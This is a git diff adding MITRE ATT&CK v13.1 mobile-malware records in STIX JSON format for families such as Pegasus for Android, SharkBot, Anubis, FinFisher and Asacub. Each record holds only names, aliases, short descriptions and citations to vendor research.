@@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--4eb4a60d-267f-489c-9186-8e75a35ba442", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Pegasus for Android", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "Pegasus for Android", + "Chrysaor" + ], + "type": "malware", + "id": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "created": "2017-10-25T14:48:41.202Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0316", + "external_id": "S0316" + }, + { + "source_name": "Pegasus for Android", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Chrysaor", + "description": "(Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor)" + }, + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + }, + { + "source_name": "Google-Chrysaor", + "description": "Rich Cannings et al.. (2017, April 3). An investigation of Chrysaor Malware on Android. 
Retrieved April 16, 2017.", + "url": "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json new file mode 100644 index 0000000000000000000000000000000000000000..e39503abf07ab71681b32bb6b3b837339bc78f35 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--41486315-cd28-433e-bbba-b8222b23d9b1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "FrozenCell" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--96ea1e13-d50f-45f1-b0cf-4ac9bc5a2d62", + "type": "malware", + "created": "2021-02-17T20:43:52.033Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0577", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0577" + }, + { + "source_name": "Lookout FrozenCell", + "url": "https://blog.lookout.com/frozencell-mobile-threat", + "description": "Michael Flossman. (2017, October 5). FrozenCell: Multi-platform surveillance campaign against Palestinians. Retrieved November 11, 2020." + } + ], + "modified": "2021-04-19T14:07:24.519Z", + "name": "FrozenCell", + "description": "[FrozenCell](https://attack.mitre.org/software/S0577) is the mobile component of a family of surveillanceware, with a corresponding desktop component known as KasperAgent and [Micropsia](https://attack.mitre.org/software/S0339).(Citation: Lookout FrozenCell)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json new file mode 100644 index 0000000000000000000000000000000000000000..d7e2792beaf0e8b4b277546bcd47839964dd6ec8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--50705e7d-e39c-4cbc-824a-8b36ac86c5f9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "type": "malware", + "created": "2020-10-29T18:41:49.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0524", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T18:41:49.272Z", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json new file mode 100644 index 0000000000000000000000000000000000000000..34e0888e3ce17ab20602dae7c84cec68aecd8229 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9cd72f5c-bec0-4f7e-bb6d-296937116291.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--038ff49f-31de-416a-9858-88c2f392b71f", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-28T21:05:57.018Z", + "name": "SharkBot", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) is a banking malware, first discovered in October 2021, that tries to initiate money transfers directly from compromised devices by abusing Accessibility Services.(Citation: nccgroup_sharkbot_0322)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "SharkBot" + ], + "type": "malware", + "id": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "created": "2023-01-18T19:44:52.711Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1055", + "external_id": "S1055" + }, + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a \u201cnew\u201d generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json new file mode 100644 index 0000000000000000000000000000000000000000..fa91a311de8b2cb2b094518b1e756aecebef3925 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--f41ad7de-97a1-4f94-8fd2-cbb5fe2cf44d", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "RedDrop", + "description": "[RedDrop](https://attack.mitre.org/software/S0326) is an Android malware family that exfiltrates sensitive data from devices. (Citation: Wandera-RedDrop)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_aliases": [ + "RedDrop" + ], + "type": "malware", + "id": "malware--9ed10b5a-ff20-467f-bf2f-d3fbf763e381", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0326", + "external_id": "S0326" + }, + { + "source_name": "RedDrop", + "description": "(Citation: Wandera-RedDrop)" + }, + { + "source_name": "Wandera-RedDrop", + "description": "Nell Campbell. (2018, February 27). RedDrop: the blackmailing mobile malware family lurking in app stores. Retrieved September 18, 2018.", + "url": "https://www.wandera.com/reddrop-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json new file mode 100644 index 0000000000000000000000000000000000000000..54b1ceed752cc3cae4a9e767258374df1186b40c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a0d774e4-bafc-4292-8651-3ec899391341.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--1fd7d976-6540-40de-b0cf-01a5be61f920", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "type": "malware", + "created": "2020-12-31T18:25:04.779Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0555", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2021-03-25T16:42:05.526Z", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json new file mode 100644 index 0000000000000000000000000000000000000000..3d7da16c375832885dd1cb18230727382a198f2d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a15c9357-2be0-4836-beec-594f28b9b4a9.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--37b89d02-516d-4a83-9657-65823f4597eb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:19:15.826Z", + "name": "YiSpecter", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_aliases": [ + "YiSpecter" + ], + "type": "malware", + "id": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "created": "2017-10-25T14:48:48.301Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0311", + "external_id": "S0311" + }, + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json new file mode 100644 index 0000000000000000000000000000000000000000..0a2a2c3ce9758b6326326cbfcece67c8a43fa729 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--363e1611-2fba-4bf9-a72d-34915d44cd00", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "[Trojan-SMS.AndroidOS.Agent.ao](https://attack.mitre.org/software/S0307) is Android malware. (Citation: Kaspersky-MobileMalware)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a1867c56-8c86-455a-96ad-b0d5f7e2bc17", + "created": "2017-10-25T14:48:46.411Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0307", + "external_id": "S0307" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Agent.ao", + "description": "(Citation: Kaspersky-MobileMalware)" + }, + { + "source_name": "Kaspersky-MobileMalware", + "description": "Roman Unuchek and Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved December 22, 2016.", + "url": "https://securelist.com/mobile-malware-evolution-2013/58335/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json new file mode 100644 index 0000000000000000000000000000000000000000..8eba384284a937a237aeb18378af910298f810e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--19d7f108-520e-4663-9e2c-98bb1cf95d14", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Anubis" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a3c59d82-2c7c-44e5-a869-68e0a3e5935e", + "type": "malware", + "created": "2020-04-08T15:41:19.114Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0422", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0422" + }, + { + "source_name": "Cofense Anubis", + "url": "https://cofense.com/infostealer-keylogger-ransomware-one-anubis-targets-250-android-applications/", + "description": "M. Feller. (2020, February 5). Infostealer, Keylogger, and Ransomware in One: Anubis Targets More than 250 Android Applications. Retrieved April 8, 2020." + } + ], + "modified": "2021-09-20T13:50:01.923Z", + "name": "Anubis", + "description": "[Anubis](https://attack.mitre.org/software/S0422) is Android malware that was originally used for cyber espionage, and has been retooled as a banking trojan.(Citation: Cofense Anubis)", + "x_mitre_version": "1.3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json new file mode 100644 index 0000000000000000000000000000000000000000..64d578f6b2beb83050aecab9d4e1106445da193a --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a3dad2be-ce62-4440-953b-00fbce7aba93.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--a3a0f5e0-204c-4991-8957-5ed7a1fc95a0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "AndroRAT", + "description": "[AndroRAT](https://attack.mitre.org/software/S0292) is malware that allows a third party to control the device and collect information. (Citation: Lookout-EnterpriseApps)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--a3dad2be-ce62-4440-953b-00fbce7aba93", + "created": "2017-10-25T14:48:47.363Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0292", + "external_id": "S0292" + }, + { + "source_name": "AndroRAT", + "description": "(Citation: Lookout-EnterpriseApps)" + }, + { + "source_name": "Lookout-EnterpriseApps", + "description": "Lookout. (2016, May 25). 5 active mobile threats spoofing enterprise apps. Retrieved December 19, 2016.", + "url": "https://blog.lookout.com/blog/2016/05/25/spoofed-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json new file mode 100644 index 0000000000000000000000000000000000000000..3e879c821c7df46c774aadcfae7ef4aa46a45b46 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a5528622-3a8a-4633-86ce-8cdaf8423858.json 
@@ -0,0 +1,77 @@ +{ + "type": "bundle", + "id": "bundle--de65019e-6860-4c89-a406-2bb801d72ba0", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows", + "Android" + ], + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_aliases": [ + "FinFisher", + "FinSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0182", + "url": "https://attack.mitre.org/software/S0182", + "source_name": "mitre-attack" + }, + { + "source_name": "FinFisher", + "description": "(Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "source_name": "FinSpy", + "description": "(Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017)" + }, + { + "url": "http://www.finfisher.com/FinFisher/index.html", + "description": "FinFisher. (n.d.). Retrieved December 20, 2017.", + "source_name": "FinFisher Citation" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html", + "description": "Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. 
Retrieved February 15, 2018.", + "source_name": "FireEye FinSpy Sept 2017" + }, + { + "source_name": "Securelist BlackOasis Oct 2017", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, October 16). BlackOasis APT and new targeted attacks leveraging zero-day exploit. Retrieved February 15, 2018.", + "url": "https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/" + }, + { + "url": "https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/", + "description": "Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher\u2019s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.", + "source_name": "Microsoft FinFisher March 2018" + } + ], + "modified": "2022-03-02T15:47:13.329Z", + "name": "FinFisher", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)", + "x_mitre_version": "1.4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json new file mode 100644 index 0000000000000000000000000000000000000000..7bee296570b0a5719d443b6257ef654355119914 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a6228601-03f6-4949-ae22-c1087627a637.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--3edfeaa2-f972-4e01-9441-4b36b3ef28ea", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "type": "malware", + "created": "2020-05-07T15:18:34.417Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0440", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." + } + ], + "modified": "2020-06-17T12:49:21.423Z", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json new file mode 100644 index 0000000000000000000000000000000000000000..b012e1f26bfd8c6f1540a4fb459c34f3a3b7099d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a76b837b-93cc-417d-bf28-c47a6a284fa4.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--062470c8-a31a-4183-901a-45d685404979", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "type": "malware", + "created": "2020-12-14T15:02:35.007Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0540", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020." + } + ], + "modified": "2020-12-16T20:21:43.239Z", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims\u2019 bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--a993495c-9813-4372-b9ec-d168c7f7ec0a.json new file mode 100644 index 0000000000000000000000000000000000000000..20c7ead3420e1912160b575be73a7498252598b6 --- /dev/null 
